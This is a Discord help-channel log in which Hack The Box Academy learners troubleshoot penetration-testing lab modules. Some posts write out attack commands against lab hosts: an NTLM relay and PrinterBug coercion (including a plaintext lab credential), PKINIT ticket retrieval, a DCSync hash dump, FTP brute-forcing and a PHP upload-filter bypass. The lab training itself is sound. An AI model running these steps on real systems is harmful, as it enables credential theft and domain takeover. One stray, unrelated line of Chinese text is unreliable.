#modules

The correct username is part of the challenge, so no

it is one of those right?

but it is a problem on the machine

I cannot tell you, the module is above tier 0. Please dont post spoiler content :))))))))

oh okay :))))))))

so should I wait until you buy a new servers or what?

I don't maind you know

I can pay for that myself

after 10 attempt Once the OTP token has been reset, you must send the OTP brute force request immediately, otherwise you will remain blocked 🙁

[STATUS] 32.00 tries/min, 32 tries in 00:01h, 2954 to do in 01:33h, 16 active

nice 1:hours

1:30

after2 minutes it will be 3000 hours

Im not staff lol so idk about "buying new servers"

Also dont take the estimate as a pure fact

Also, why arent you doing localhost

God please help

That's another part of your problem. You're attacking the public facing ftp server, which is locked down to hell and back

You're meant to attack the INTERNAL localhost

Yes, theres a difference because they're containerized

like attack me or something?

No

Ssh in with the creds from part 1; attack ftp from within (localhost)

I should attack from my local machine? that is what are you trying to say??

you already told me that I can't

when I got into ssh they already have a password list

I am using that

why should I use the one from part 1 section when they already give me a new one in part 2

and it is not about the list it is about the server

hello mam

Friend

The module teaches you this exact thing

Don't attack the public ip, attack localhost/127.0.0.1

I was doing on the machine

sorry

am I going to jail?

No, htb owns that server

Just be mindful

when I got into ssh I run netstat to look for ftp open and did not find it

so you don't need a new server?

but it was also kind of slow

I wtill don't mind to pay for that

Its there

I run netstat -tnpa | grep ftp 🥲

found nothing

Hi, not sure if this is the right place, but Im having an issue with xfreerdp on the Pivoting Module Assessment, where someone else is trying to connect, and we keep kicking each other off every time we connect. is there anything I can do to avoid this? I dont want to kick off the other person incase they are in the middle of something. Thanks!

Can you try restarting your instance? Maybe they’re just connecting to the wrong ip

It's probably your session. Academy module challenges are not a shared environment.

Restarted the instance, got back into rdp all fine, so thats all good. thank you.

Not sure i quite understand. if someone else is accessing the same machine, is that not a shared environment?

Right, but it's not a shared environment. No one else was accessing it.

we left notes to each other asking if someone else was in here 😅

or am i not understanding the terminology? (excuse the noob question)

Maybe someone had the IP wrong and was trying to connect to the others env

I’ve seen it before, people mistyping an IP

Gave @low girder a headache

It's possible

I connected my ligolo agent to someone else's proxy listener the other day

It happens

hi guys, for the LLM Output Attacks skills assessment, the web app keeps crashing. I've only started on the imagebot. I've figured its a ||sql injection|| vulnerability, but any attempt crashes the web app. I've restarted 5 times. Am i going down a rabbit hole ? (maybe its trying to tell me this attack isn't the way in)

Hi everyone!
I’m currently working on the Advanced XSS and CSRF Exploitation Skills Assessment and I’ve hit a bit of a roadblock. I’ve tried several variations of the example payload from the module to identify the ||SQLi|| point, but I either receive no response or the ||API ||returns:
||{"error":"Something went wrong"}||

Has anyone encountered this or found an approach that works? Any hints or guidance would be greatly appreciated!

Anyone able to help me out with "Attacking Domain Trusts from Linux"? I managed to perform the ExtraSids attack but not sure how to go about obtaining the NTLM hash for bross

so the extra SID attack should be forging a Golden Ticket in Kerberos. do you get the .ccache file as a result? from there you should be able to use the ticket and auth over kerberos.

Yea I get dropped into nt authority\system on the parent dc, but I don't really know how to get the NTLM hash for a specific domain user from here

none of the tools i've been working with in the modules are available and I can't use vssadmin either to make a copy of NTDS.dit

So the ticket itself isn't the problem but capturing the ntlm hash is

I didn't keep heaps good notes but dont you just use secretsdump since you have admin creds in the dev subdomain?

you can dm me 🙂

Well yea I used secretsdump to dcsync to get the child domain's krbtgt hash for the golden ticket

but I can't use secretsdump on the parent domain

you don't need to

Well how am I going to get the NTLM hash for "bross" then?

thats what I'm struggling with

you dont need it

I do xd

Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer.

you dont need the hash of bross to compromise the domain, you get the hash by compromising the domain

scrolls back up to the subtitle extrasids attack - linux

and it will give you the requirements to compromise the parent domain

then you use secretsdump to dump the hash of bross

when you do the extrasids attakc you construct a golden ticket, which gives you domain admin in the parent domain

Yea, I did that, but how do I use secretsdump to dump the NTLM hash if I don't have a password?

I tried using -k -no-pass but can't get it to work

then you are doing something wrong

I can connect to the parent domain using psexec though

i am in the wrong module

i saw extrasids adn went to the trust attacks

which is annoying because its the same steps

possibly upload mimikatz and run that?

Yea that was going to be my next step, but I just feel like I am missing something because that's not really the point of the module I feel like

sometimes the questions will go a little beyond the instructions of the page

keeps you thinking

fair enough

|| yes, printer.py will work after that ||

Hey guys im currently on module https://academy.hackthebox.com/module/67/section/631 there for after logging via RDP i couldnt navigate to gpedit.msc! xd

Anyone done the new wifi modules ?

Use the credentials provided to log into the target machine and retrieve the MySQL credentials. Submit them as the answer. (Format: <username>:<password>) ...
anyone can help me with module Cracking Password / SPraying , stuffing and defaults?
i found the flag, but the question is Password and username.. vry complicated.

Hey guys, I'm currently working on the footprining, I hit a road block on the DNS server enum last question, please help, I can seem to find the required host

in the Attacking Common Applications module, Splunk section, the Splunk instance appears to be inaccessible (Empty reply from server). Has anyone else encountered this?

The other application on the same host works fine.

Hi, what do you mean it "crashes the web app"? If you are still stuck feel free to DM me 🙂

https://academy.hackthebox.com/module/298/section/3962

Anyone i can ask 2 silly stuff about Wi-Fi Penetration Testing Tools and Techniques SA's ??

incident handling process module cannot access the hive

both on pwnbox and on my pc via vpn

any help pls ? i cannot progress since it has a flag

I'm still having this issue. Is bypassing the Splunk module the way to go?

Command Injection Module
Skills Assessment Section
https://academy.hackthebox.com/module/109/section/1042
I don't want to be too specific and give out too much but what I don't understand is why the application works as expected when you make some legitimate operations to the files but the character filtering activates when you make a specific legitimate operation that in theory shouldn't cause the filter to activate. I think I'm imagining the underlying bash command correctly and it probably contains a specific filtered character but I'd love to know if I'm right about it. Happy to discuss privately if someone else wants to DM me. I've found the injection point of the application that is vulnerable and I've solved the challenge but it would be nice if I someone else could confirm my suspicions.

Use the credentials provided to log into the target machine and retrieve the MySQL credentials. Submit them as the answer. (Format: <username>:<password>) ...
anyone can help me with module Cracking Password / SPraying , stuffing and defaults?
i found the flag, but the question is Password and username.. vry complicated.

Good day, everyone! Please I need a hint for the SQL Injection Fundamentals - Skills Assessment. I have tried different payloads for the first question (What is the password hash for the user 'admin'?) for quite 2 days and did not yield any fruitful result! Please any pointer would really help!

can anyone help me with this question? I tried to do "dig axfr @10.129.42.195 inlanefreight.htb" and the opposite but it didnt work

I think I didn't understand it well

Information Gathering - Web Edition Module
DNS zone transfer section

I'm not sure what's in the exam, but if you planned to password spray, enumeration can help determine what you might come up with, i.e., if you enumerated shares and found a document with a password, but it didn't work when you tested it across users. You could use that as a baseline word to come up with some words to spray. I'd also note the passwords and variations from the password spraying section as they are considered common, so those could also be used as a baseline. Also, since your post has spoiler content for a module above Tier 0, I am going to delete it.

Can anyone help?

Please this one!

Can u help me since u passed information gathering web edition?

Which section is that?

DNS zone transfer

DM me!

Ok

Can you register an account?

I was not able to! It would always that the invitation code is invalid!

I'd start there

Okay! Using Burp Intruder?

Using the techniques taught in the module.

You can also reference the provided cheatsheet.

Okay! Let me give it a try ASAP! Thanks!

Do not post content above Tier 0 and do not post content with passwords. Ask your question or explain your issue as best as you can without spoiling information.

I have the same issue. Really cool module but yea should come with a disclaimer that this is going to devour your computer

I feel the invitation code validation is being done by raw PHP. Upto now I could not pass through!

file transfer windows section - access denied error

i tried base64 encode decode method

so I did this by section by|| creating ftp server and running ftp client from rdp instance ||
but cant I simply|| connect to ftp server running on the rdp instance|| ?

yes thank you mister Rick

people should understand that

so just login to that page? thats it? in a browser?

Bro, youre a module ahead, if possble, can you help me

guys in the javascript deobfuscation

when you deobfuscation the js code you will find the flag but when im put the flag is not working

my best guess is you worked ahead of where it wanted you to

what's the actual section?

Deobfuscation

Using what you learned in this section, try to deobfuscate 'secret.js' in order to get the content of the flag. What is the flag?

the flag should be HTB{1_4...0r!} (not posting the full flag for obvious reasons)

yeah ifound it like this

but is not work

make sure there's no extra whitespace then

there should be no spaces or '+' characters

ok

Hopefully im not bugging you all too much 🙁 Getting ready for the cpts exam soon!
I was working on a module for password attacks and was able to pivot to the first host, but after escalating to root it seems like I can't use sudo?
error in /etc/sudo.conf, so the system is broken or maybe it is a fake root because of the HTB infastructure, but I was going to try and pivot further with tools like responder/ntlm relay/tcpdump

What’s up? DM

sudo isn't always the way forward. sometimes credentials can be hanging out

none of what is required after root requires sudo as an fyi ¯_(ツ)_/¯

but if all else fails just reset the box, change vpn regions, reach out to support on the website

I finally did it, the blue modules were easy but so annoying

good luck on the exam

Yes. || Follow the exact endpoint then login then run the printerbug.py ||

too busy with college rn, will probably have to do it some other time

I figured out the next step, thanks. Definitely need to refine my notes and work on credential enumeration. My weakest skill by far.

Does anyone know how to convert a VIP subscription to a VIP+ subscription, and whether this will affect my Academy "cubes". I can't find any info on this in the Help or FAQ sections, and the support system is now some kind of Ai, "Hive Mind", that's been telling me that converting my subscription has something to do with "cubes", although I can't seen to find any information on that anywhere. It says: You can upgrade from VIP to VIP+ through your Billing & Plans section. Since your VIP subscription expires in June 2026, you'll pay a prorated amount for the upgrade and receive the equivalent prorated cubes. When your subscription renews for a full billing cycle, you'll get the complete VIP+ cube allocation.

Vip is no longer offered, and I believe all vip were upgraded to + at no extra charge when it happened. But VIP/VIP+ isnt an academy thing. You'll need to wait for a support person to respond. It has 0 to do with cubes

Has anyone finished the Attacking AI - Application and System -> Rogue Actions activity? I am having trouble getting to the flag and could use a tip

hey did you end up figuring this out?

hi is anyone available for DM regarding the Windows Event Logs and Finding Evil module?

I have had a lot of trouble with the second section for like a week now

I'm confident I identified the hash they told me to identify but its not accepting it as an answer

so I must be doing something wrong when I run the malicious program

because that would explain me having the wrong hash even when I go to the exact event log

in the exact folder

with the exact filename they told me

||AC24CCE72F82C3EBBE9E7E9B80004163B9EED54D30467ECE6157EE4061BEAC95 is the SHA256 hash I found but this hash is not accepted as the answer||

I'll have a look rn

ok thanks

I'm 99% sure that's the right hash

if not I probably did something wrong with the executable

but that's the exact hash I found when following the exact instructions

Not the right hashes.

Oh that thing.

With the damn spoolsv.

Try to reset the machine.

I did it after like..3 resets.

ok

what am I doing wrong?

The spoolsv itself wasn't compromised the first 2.

does it change the hash?

ah ok

gotcha

Just make sure it appears green.

It will take a few times.

so I have to run the malicious file first and then open event viewer?

ok thanks

DMs.

ok

any help with the privesc in the "Intro to C2 Operations with Sliver" module??

the entire password module is supposed to take 8 hours but it takes that long just to do the assessment lmao

DM

https://academy.hackthebox.com/module/58/section/526
for case5

ok could someone please assist in why the sqlmap is always giving a different result for the flag?
also how can you tell its using ||MYSQL|| as the database???

you can DM me if you still need help

will do

I like when it no work

https://tenor.com/view/dreamybull-gif-2667384851633282250

Hi everyone, can anyone help me with the Password Attacks module (section: Spraying, Stuffing, and Defaults)?
​I'm a bit lost on finding the correct password. I've managed to access the machine and found a flag.txt inside a folder, but I'm not sure what to do with it or if it's the actual answer.
​I also found two other users and a Notes.zip file. I tried using some tools (fcrackzip, john) to crack the zip password, but I haven't been successful yet. I believe the answer/password I need is inside that zip file.
​Has anyone faced this or have any tips on how to proceed with the zip? Thanks!"
​Dica: Se quiser parecer mais técnico e direto, pode usar essa versão mais curta:
​"Stuck on Password Attacks - Spraying, Stuffing, and Defaults.
I have SSH access and found Notes.zip in a user's document folder, but I can't crack it. I also found a flag in ~/smb but it doesn't work for MySQL.
I suspect the next step is inside the zip file. Any nudges on how to open it? My tools are failing to crack it."

yeh, I just did whatever looked interesting 😂 , but highly recommend completing pivoting ASAP. Spent a solid week just on that section and it has helped with everything else.

hi, did you manage this fix this "aborted, xterm test session failed"?

in case anyone trying the fluxion encountering the "aborted, xterm test session failed"
try the command in this github issue https://github.com/FluxionNetwork/fluxion/issues/221#issuecomment-1326014139

in the password attacks -pass the certificate module ive exported the cache to temp and while viewing the ntlm hash this happens , any ida why ?
impacket-secretsdump -k -no-pass -dc-ip 10.129.234.174
-just-dc-user Administrator
'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[] Using the DRSUAPI method to get NTDS.DIT secrets
[-] 'NoneType' object has no attribute 'getRemoteHost'
[] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[] Cleaning up...

i tried to enumerate different template via certipy against the DC but that didnt work too..

something is wrong with your ticket, do echo $KRB5CCNAME and make sure the .ccache file is in the same absolute path, or relative path from where you're running the command

it is on the temp/ccache yeah

also, does -dc-ip match the dns entry for DC01.INLANEFRIEGHT.LOCAL in your /etc/hosts?

can someone help me in broken authentication module please

I am brute forcing for hour

oh shit

did't read the module

i though for this we didnt want to configure etc/hosts ok will do that

many such cases

oh i see

wyat do you mean

means people do it all the time

what user is your kerberos ticket for

Administrator

grep -E '^(?=.[a-z])(?=.[A-Z])(?=.*[0-9]).{10,}$' rockyou.txt > filtered.txt

can I do this and use it?

did you use AI to generate it

nope refered the htb academy commands

of course yes

that question wasnt at you, my notes on the module you're doing are long gone

do you think I am a magision

sht

have another look at it

just type impacket-secretsdump and have a look at the command structure

I can't

can you look for me

im still not talking to you???

oh soryr

can you talk to me

no

i dont have notes for your module

as said above

Please

ill give you the walkthrough first i tried to get all the templates via certipy (didnt work ) so went to use ntlmrely + printer bug , got the /DC01$.pfx then used gettgtpkinit.p to get the tgt , exported to " export KRB5CCNAME=/tmp/dc.ccache" then the last command ive pasted abocve

okay im confused because you told me your ticket is for administrator

I tried administrator password did not work

still not talking to you

lMAO

ok so im trying to do the dsync attack to get administrators ntlm hash

yep

not you but him

your ticket is for the machine account?

yes yes

ffoouuuunnnddd theee passworddddddd

lettsss gogoopooooooooooooooooo

see

AI is good

I wounder if it is going to be as good as this in the exam

impacket-ntlmrelayx -t http://10.129.234.110/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication then

python3 printerbug.py INLANEFREIGHT.LOCAL/wwhite:"package5shores_topher1"@10.129.234.109 10.10.16.12

got the ticket saved

then this python3 gettgtpkinit.py -cert-pfx ../krbrelayx/DC01$.pfx -dc-ip 10.129.234.109 'inlanefreight.local/dc01$' /tmp/dc.ccache

then export KRB5CCNAME=/tmp/dc.ccache and finally the secret dump

impacket-secretsdump -k -no-pass -dc-ip 10.129.234.109 -just-dc-user Administrator 'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL

did you add the DC do your /etc/hosts?

the FQDN?

kerberos is really funny about DNS

Try to do this with an other tool

nope lol

echo "10.129.234.174 DC01.INLANEFREIGHT.LOCAL dc01" | sudo tee -a /etc/hosts

wait

thats not the right IP

what does DC stand for?

whatever the IP is

do i also need to create the krb5.conf file?

direct current?

you shouldnt need it in this case

I study it in physics

got it

that did it?

no my machine expired now i have to restart singh

HAHA

if that doesnt work try krb5.conf

sure sure

you completed CAPE man?

do you know how to generate it with netexec?

yeah

yup co-res right

printerbug alternative

coerce

theres like a million coercion techniques

on a scale of 1.10 then a scale like unimposble how hard was cape?

depends how prepared you are, how well you understand the techniques, and how good your enumeration is, i have seen a lot of people struggle but i didn't have too hard of a time

some of it was finnicky and annoying

and some was just jumping through hoops

i see i see

Good to know

there are a couple of very difficult flags

but the course is very narrow in scope so as long as you understand the subject you'll do fine

I see hmmm

Rather than crte and all this one is the best right?

i havent done crte, so i cant really say

i see

Hello i'm on the Exploiting Web Vulnerabilities in Thick-Client Applications mdoule from Attacking Common Applications.

I have an issue on this module. I'm following the writeups from the course, plus the fatty write ups from 0xdf. But i can't login on the application, i have modified the port to 1337, removed the signing and add the domaine in my /etc/host i still can't connect.

I don't know if i'm puting the good ip inside /etc/host, Can someone help me pls

More over in the write up, port 1337 is open but is not on the target from the module

Hey, i'm stuck on ntlm relay attacks skills assessment second question, been there for a while and would appreciate any hint for it.

Different question as I'm doing the exact same thing. Did you get any username using || smtp-user-enum || ? Nothing is popping up on me using || user.list || from the module reources

Thanks fam.

yo guys

im trying to install bashfuscator
im on command injection module

but i dont get /bin folder which should contain the binary after installing

cd Bashfuscator
pip3 install setuptools==65
python3 setup.py install --user````

Python 3.10.12```

their github says pyhton 3.6+ is required but i cant install it for some reason

wait a second

3.10 > 3.6

so thats not the problem

└─$  python3 setup.py install --user
running install
/home/haji/.local/lib/python3.10/site-packages/setuptools/command/install.py:34: SetuptoolsDeprecationWarning: setup.py install is deprecated. Use build and pip and other standards-based tools.
  warnings.warn(
/home/haji/.local/lib/python3.10/site-packages/setuptools/command/easy_install.py:144: EasyInstallDeprecationWarning: easy_install command is deprecated. Use build and pip and other standards-based tools.
  warnings.warn(
running bdist_egg
running egg_info
writing bashfuscator.egg-info/PKG-INFO
writing dependency_links to bashfuscator.egg-info/dependency_links.txt
writing requirements to bashfuscator.egg-info/requires.txt
writing top-level names to bashfuscator.egg-info/top_level.txt
reading manifest file 'bashfuscator.egg-info/SOURCES.txt'
adding license file 'LICENSE'
writing manifest file 'bashfuscator.egg-info/SOURCES.txt'
installing library code to build/bdist.linux-x86_64/egg
running install_lib
installing scripts to build/bdist.linux-x86_64/egg/EGG-INFO/scripts
running install_scripts
running build_scripts
error: file '/home/haji/cybersec/tools/Bashfuscator/bashfuscator/bin/bashfuscator' does not exist```

not sure what is wrong

Hi, were you able to figure out the Rogue Actions Skill Assessment Question? I could use some tips

Does the Bash Scripting Module require knowledge of BASH beforehand? I don't think it's comprehensive enough for the tasks it gives you.

everything you need to know is included in the module iirc

Nevermind I got it, if any1 is having trouble with AI Attacking Application and System - Rogue Actions in the future and wants a tip let me know

needle in the haystack challenges tho

I have no clue, any ideas. I'm stuck on it and can't complete the module until this works.

And my script is literally the same one as in the solution. been pulling my hair out

1. Are you sure it's the same
2. The module is Tier 1, don't share code or anything from the module please.

Pretty sure it is. Unless there's something hidden not actually visible.

i just redid the exercise and it's working as intended. DM me what your loop/var assignment looks like and i'll sanity check ya

Okay.

One min

https://academy.hackthebox.com/module/details/80

this is the best module I have learned

Could anyone provide some guidence on how to solve the question in the Cloud Storage section of the module 'OSINT: Corporate Recon'?

I am completely lost. For starters it is not very clear which website they are talking about. And I have searched for buckets on the one site that the module previously have used in every question. But that website seem to contain no buckets at all.

Guys im so damn confused

I need help

https://academy.hackthebox.com/module/18/section/81

the first question in this module, I did all the things, but it says my answer to the first question is wrong but i have no clue what else it could be

did you ssh into the target before finding the file?

yes

can you DM me the file you found?

yep one sec

resolved

https://tenor.com/view/dj-khaled-you-smart-smart-gif-4495825

hey, does anyone know whats up with the windows VM for active directory enumeration and attacks module?
it seems like the password given is incorrect...

it has been an issue for the whole module for me, not helping my learning experience 🙁

I don't recall a wrong password. You're probably doing something wrong. Can you provide more context into the issue you're having? Like the section, question, what command you're using maybe if it doesn't spoil anything

I was doing a section and it was taking a week to solve the first question of the section so yesterday I looked at a walk through of it. Will that negatively impact my being able to understand the rest of the module? I got help with the section and I was told to google the question because of how hard the question was.

How much will the walkthrough of the one section set me back. It was the second section of Windows Event Logs and Finding Evil module.

Hlow

is anybody here to help me i am gotta stuck in a linux fundamentals . the password that was given by htb that is present in my_credential file . when i tried to connect ssh with this command ssh htb-student@targetip . and then they asked my password they said permission denied

plz somebody help me

i gotta stuck for 3 days 😫

i don't believe the password is in a file, but it shows you next to the username

w8 bro iam going to send you a password ok

thats my passwd ZXyKYL

doesn't sound right

best to say which section you're on, helps a lot

bro username also present in this file

nope that's probably for pwnbox, the username and password for the module challenge and to remote into the victim machines is going to be where you spawn the box, but not all modules have victim boxes which is why i said you need to also say the section just not the module

bro i am in a linux fundamentals in system information sections 30 page 6 system information

yep, it's exactly as i said

right where you spawn the target it provides the username and password

here my passwd is presnt?

thnks bro for your help . i am very gratefull to you

Hi Everyone, I am new to HTB and Cybersecurity. I have been studying this topic for about 4-5 months now. Recently passed my Comptia Security + exam. I am now studying network + to learn networking and I am now using THM and HTB to build hands on experience and create my own labs. I am currently doing linux fundamentals on academy. I was wondering where should i pivot to next after this. Should i just decide on a path or explore other modules like windows fundementals , nmap, ad etc. My end goal is to get into penetration testing however i know thats a long term goal. I would like to build the skills necessary to get in at entry level and work my way up. Thank you to anyone who takes the time to respond to this!

更同時推翻了之前仰賴形態學建立的地懶種系發生樹。這項研究指出二趾樹懶與磨齒獸為近親

i have tried multiple workarounds that just result in incorrect password

I wasn't replying to you, but for this one, it looks like this is an AD module based on the password provided. Assuming that's true, your issue is you're prefixing the username with the machine name which would make it attempt to log in with a local account. Instead you want to log in with a domain account.

its all the sections aswell

oh

Thankyou, works now.

Hi all, for skill assessment for documentation and reporting, I discovered the user that has backup operators permission on the domain.
however I tried abusing via robocopy but couldn't. whoami /priv does not show the backup privilege.
How can I abuse this?
I have finished the skill assessment, I just want to know how this can be abused.

It's covered in Windows Priviledge Escalation module, the Windows Built-in Groups section

You are right. However, I was unable to RDP into DC as the backup operator user to abuse that. I tried abusing from a different host as the backup user but got access denied. what did I miss?

I don't recall exactly. I bet there's a way though, maybe not RDP but something else.

Guys I have a few questions regarding privs..
I am doing htb windows priv esc module. My user is already a local admin then why are we learning using this account if we are already local admin and why cant i connect to machine using psexxec or winrm it shows error. And when i run whoami privs as a non elevated shell i dont see my provs but when i run it as admin i see. Whats the role of privs if i can run as local admin?

Can someone help me, why doesn't downloading libs work

it just freezes

Network is unreachable

Yeah, I’m using UK free vpn, tried US too tho. Any idea how to fix?

If I remember correctly, the free versions of PwnBox do not have Internet access. In this case, it is best to use your own VM with VPN.

Ah, thanks for letting me know just wanted to be sure it wasn’t any actual issue. Ill probably buy the vip version then

Local admins aren't always domain admins so you gotta learn how to pivot towards a domain account and sometimes this means going to another user. As for psexec or winrmexec see above, usually only domain admins have those perms, not local admins. Essentially your query boils down to the separation of privileges of a local admin from a domain admin. Also read up about process tokens which explain the shell privileges.

Thanks I think that solves my query. I will learn the differnce between the 2

But What if my user is not local admin but has some good privs so how can I bypass filterd tokens to use those privs?

Okky

Hello, in Attacking Common Applications / Attacking Thick Client Applications, powershell itself is not working with an error The type initializer for 'System.Management.Automation.Runspaces.InitialSessionState' threw an exception.. Is this expected? I'm unable to procceed with the module.

basically im unable to generate the binary i'm supposed to be analyzing, because it's supposed to be generated using a powershell script.

I have a confusion in the active directory module,

Where is this Linux attack machine actually located? inside the target network, correct?
but when I connect the hackthebox vpn, how can I ssh into the linux machine, it's a private ip address... is the hackthebox network that I'm connected to via vpn is also connected to the target's network somehow?

💋 that's for you

and also

• ssh htb-student@______
  ssh: connect to host _____ port 22: Connection timed out

why does that happen?

did you connect ot the vpn

yeah
I did do a reconnection and that problem worked

thanks
do you know the answer to my other question?

what is it

you can DM me if you need help

I have a confusion in the active directory module,

Where is this Linux attack machine actually located? inside the target network, correct?
but when I connect the hackthebox vpn, how can I ssh into the linux machine, it's a private ip address... is the hackthebox network that I'm connected to via vpn is also connected to the target's network somehow?

if you have the name and password you can just do

ssh username@IP

then they will ask you for the password

anyone to help me on the skill assessment on "Stack-Based Buffer Overflows on Windows x86"? im just having problem on one part and i dont get why/how 🙁

Windows priv esc citrix escape session the vm is too slow I mean come on fix that it’s almost undo able

Hello. I am on introductions to red teaming ai. Specifically on the manipulation the model last question.

Anyone can help me with the question ?

thanks >>>

I am in windows priv esc module -> interacting with users . When I use the command shown in the course to start responder : sudo responder -wrf -v I tun0 I get error no option r exists . Please help

try removing the -r parameter then

Hello everyone. Who completed the AI ​​Red Teamer Model? I really need help.

I am in Introduction to Red Teaming AI, Manipulating the Model. I am running the AI lab on my machine not the HTB academy pwnbox. Where is the main.py that contains the train and test split that is needed for the module?

it says in the module instructions "We will use a slightly adjusted version of that code, which you can download from the resources in this section."

Where is the resource section that contains the slightly adjusted code?

Nevemind. I found the solution 🙂

I need some help with pass the ticket from windows. I can't seem to get john's ticket. I ran:

1. mimikatz.exe
2. privilege::debug
3. sekurlsa::tickets /export
4. dir *.kirbi - all krbtgt are TGTs

There is no john but there is a julio and i did the pass the ticket with his account and I got the flag. But john is no where to be seen.

Who completed HTB AI red teamer model path ? I need help for that

not me

but I will try to help

since I always fool gpt I can consider my self a AI hacker

I need path answer i have uni yesterday. Teacher gave for completing if u dont it. I take F for that 🙁

how can I help you dude I did not understand you

How much of the path do you have left

50.8%

Sounds like you've left it to the last minute

I did it during 10 days. That is my best bro 🙁

I am try do my best. But that is hard for me right now.

what is it

I have task for completing AI red teamer model all of them.

Uni assignment

oh cool

He's asking for the module answers for the path

Right

You know, academic integrity

what about ?

it sounds like you'll get an F if you don't get the correct answer

so you should study

😉

No one is going to give you the answer. Best you can do is ask for hints or something. I suggest studying the material and focusing, you can do it. the material teaches everything you need to know.

No one here can help with that, you need to do it yourself.

I can

He's asking for answers for the whole path.

I don't think it's a good idea to help him cheat

it is not cheat

Oh well then. The material has all you need, so it's not "too early" for that kind of homework.

dude this channel for n00bz to ask for help

my favorite place

Yes it is, providing answers is cheating.

He doesn't want help he wants the answers

if I help you will not tell him right?

you know I wish I can help you but I did not do a single module in that path

they did not even tell me I am brute forcing ssh while I thougth I was doing it on ftp for 5 hours

and you want to get the wwhohoooolllleeee paaattthhhhhhhhhh

Yes but i need 15 days for completed but my teacher give me 10 days for completed. i think He didn't think i am 18 and i need preparing for other lesson and task

areeeee eyyooooooooooooooooouuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu

kinnnnnnddddddinnnnnggggg meeeeeeeeeeeeee

That's something you should discuss with your teacher

yes there is something I need to discuss with you

Thank God you are not my teacher. thanks

someone in the general chat told me deeznut means this balls

so does your name mean super balls?

and thank you

My handle can be defined in multiple ways, the definition is in the eyes of the beholder

wait what does that mean

your handle?

what does handle mean

does it mean the way you handle things

omg that is complicated

I am not entertaining this conversation please keep this channel on topic

okay 💋

I love you

Hllo all. I'm on the api attacks module / unrestricted resource consumption. I know that I need a customer ID but I cant find a way to find one. What do I miss ?

I can help you

is this thing about IDOR or something?

SORRY

I can't hlep myself

@surreal rain @urban sage

sorry dude I sear I don't have the real flags

I did not do the modules

Don't ping admins/mods over non admin/mod related stuff. They aren't here to help you with modules. You need to do modules on your own, like I said.

I am doing but i send for this talking style.

look up

I already told you multiple times no, stop asking for answers. Go do it yourself. If you get stuck you can ask for hints, no one is going to give you answers it's against the rules.

I mean..

I can give it to him again if he asks

i dont ask answer. now i have a problem about @coarse pine . I am child and he talk me with balls

yes footballs

ALSO

you can't DM people without permission

Hi all, need help with Widows Lateral Movement - SMB Section - 2nd question (the service ALG). Got a hit on the smbserver but got error ERROR_FILE_NOT_FOUND when starting the service. I double checked everything, I don't understand what's wrong. Edit: Sorry, got it 🤦

You literally said it (even as a joke), that one's on you

What VM are they referring to in the Advance SQLi module - Live Debugging Java applications section? https://academy.hackthebox.com/module/188/section/1995

Once all of this prepared, we will connect to the VM using SSH while forwarding port 8000.

I need help. I am getting annoyed because I dont know what I am doing wrong.
I am working on whitelist uploading. This is what I have in Burpe suite

@winter glade Please take care not to post content from modules abover tier 0

oh my bad. I didnt mean to post anything that could be giving things away. I just wanted to seek out some help and wanted the info to ensure I can be helped... my fault

The filter sections build off each other. I dont recall exactly where the whitelist one is in that module (though ig I dont know which module you're referring to)

I have went back over and over with the blacklist and other ones and still cannot figure it out. I am almost done with the web penetration pathway and this has been stumped me for about 2 weeks now

This section has you deal with double extensions yeah?

correct. I have succesfully uploaded the file on burpe suite... I am using character injections to ensure it bypasses everything. From there, I do not know what to do

If its uploaded then all you need to do is visit it like you have with the other sections. As a note, nullbyte stuff is a pain in the ass (\x00) avoid it where possible

that is where I am stuck. i have tried accessing every url I can think off with the \x00 nullbytes. However, everything returns back the same: 404 Not found

@fathom pendant can I dm you some printscreens? Maybe it something so obvious that I am overlooking because I have extreme Whitelist fatigue lol

don't use those; they're a pain as i said

double extensions are the way; just gotta find the right .ph* extension to combo with and order

okay. Is there a specfic extension list... the one that is provided does give me one that works. The only one that works are the nullbyte extensions

the one that was provided worked for me

hmmm... interesting the only ones that are uploading successfull are the ones with nullbytes that I am using from the site.

ah i remember how i did it now; i injected the php wordlist before and after the normal extension in separate tests 😉 so it injected filename.ph*.(image ext) in one set of tests, and filename.(image ext).ph* in the other

trying that now

LFGGGGGGGGGGGGGGGGGGGGGGGGGGGGG!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! HOLY SMOKES!!! I LOVE YOU @fathom pendant

had to recall while looking at my screenshot with literally 0 notes or context LMAO. good thing I included the payload in the screenshot to jog my memory

@winter glade deleted because spoilers (i worded my response the way i did on purpose). Second, the module literally tells you about this scenario 😉

I think before I was so focused on the command injections that I overlooked that part of it. I was just super fatigured with the module question that it was something simple... that tends to happen with me quite often.. thank you

Hi all,
I am stucked on Android Application Dynamic Analysis : Bypassing Detection Mechanisms.
Kept getting Error: java.lang.ClassNotFound in Frida.
Tired to follow the steps in the solutions but didnt work.

Hello everyone,
can anyone tell me please which labs i should solve to prepare/practice for the CJCA exam?
thanks in advance

I'm on the skill assessment for the "Hacking Wordpress" module and I am totally stuck. I'm unsure what I'm overlooking or what I don't know that I'm supposed to know. Furthermore, I'm out of wpscan API token usage for the day 😭. Could somebody maybe look over what I have to tell me if I'm overlooking something obvious, am missing required knowledge, or if something is broken? Happy to screenshare if that is easier.

I get that I can use LFI to download a file that may have a flag, but I'm not sure how to know which file that is.

Heck. I think I figured it out. Thanks @gil0x1337 from 4 months ago.

Asking for Information Gathering - Web Edition , the Final Question on Web Archives of the wikipedia.com

Although not mentioned in the module's change log, I believe the target date range has changed from March 2001 to March 2003.
I think the questions and dates differ from the previous version.
My screen still shows the answers from for March 2001, and correct answer status,
so the questions have changed while the answers from the previous problems remain entered. This makes it impossible to verify if my answers are correct during review.
Is there no way to update my answers to match the current questions
and confirm if they are correct?

There is no way to reset the answers, no

I have all answered except for "Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.". I just don't understand what this is asking.

I gave up and used the "Show Solution" feature. I hate this question so much, it's so misleading.

it's not misleading, you're just frustrated

Those things aren't mutually exclusive.

